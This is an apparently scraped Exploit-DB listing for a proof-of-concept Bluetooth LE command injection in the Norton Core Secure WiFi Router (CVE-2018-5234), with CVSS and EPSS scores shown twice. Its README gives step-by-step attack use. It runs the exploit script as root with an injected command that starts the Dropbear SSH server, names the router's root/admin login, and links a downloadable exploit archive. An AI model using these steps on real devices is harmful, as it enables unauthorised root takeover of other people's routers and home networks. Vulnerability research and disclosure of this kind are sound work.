Lucene search

K
exploitdbEmbediEDB-ID:44574
HistoryMay 02, 2018 - 12:00 a.m.

Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC)

2018-05-0200:00:00
embedi
www.exploit-db.com
32

8.3 High

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:N/C:C/I:C/A:C

8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8 High

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

80.8%

# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234)

For more information read
[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router).

To demonstrate the exploitation, we will use:
- OS GNU/Linux;
- Bluetooth dongle adapter;
- BlueZ utility (for testing Bluetooth connection).

In order to use the script, we will need to set all dependencies in a advance:

```shell
$ pip install -r ./requirements.txt
```

With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and
functions properly.

1. Restart the router to provide access to the engineering page.
2. Start the PoC on behalf of the root user (required for operating with
   Bluetooth) with the command on executing as an argument:

    ```shell
    $ ./ble_norton_core.py "/etc/init.d/dropbear start"
    ```

    After the script is successfully executed, we get access to the device via
    the SSH connection. We put `root` as a user and `admin` as password:

    ```shell
    $ ssh [email protected]
    ```

Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44574.zip

8.3 High

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:A/AC:L/Au:N/C:C/I:C/A:C

8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8 High

AI Score

Confidence

High

0.007 Low

EPSS

Percentile

80.8%